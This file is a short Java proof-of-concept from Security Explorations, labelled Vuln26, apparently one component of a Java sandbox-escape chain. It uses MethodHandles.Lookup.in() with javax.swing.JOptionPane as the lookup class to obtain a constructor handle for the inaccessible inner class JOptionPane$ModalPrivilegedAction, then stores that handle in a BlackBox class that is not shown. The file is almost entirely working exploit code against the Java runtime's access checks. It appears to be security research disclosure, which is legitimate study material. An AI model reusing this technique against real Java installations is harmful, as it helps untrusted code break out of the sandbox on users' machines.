/*## (c) SECURITY EXPLORATIONS    2012 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* java.lang.invoke.MethodHandles.Lookup                                      */
/* access to package scoped classes via a system class as lookupClass value   */

/* in the example code, javax.swing.JOptionPane is used for obtaining access  */
/* to javax.swing.JOptionPane$ModalPrivilegedAction inner class to which the  */
/* caller has no access                                                       */

/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */

/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

import java.lang.*;
import java.lang.invoke.*;

public class Vuln26 {

 public static void get_methodhandle() throws Throwable {
  Class clazz=Class.forName("javax.swing.JOptionPane");

  MethodHandles.Lookup l=MethodHandles.lookup();

  MethodHandles.Lookup lsys=l.in(clazz);
  System.out.println(lsys);

  Class ctab[]=new Class[2];
  ctab[0]=Class.forName("java.lang.Class");
  ctab[1]=Class.forName("java.lang.String");

  MethodType desc=MethodType.methodType(Void.TYPE,ctab);

  Class c=Class.forName("javax.swing.JOptionPane$ModalPrivilegedAction");

  MethodHandle mpa_con=lsys.findConstructor(c,desc);
  System.out.println("mpa_con = "+mpa_con);

  BlackBox.mpa_con=mpa_con;
 }
}
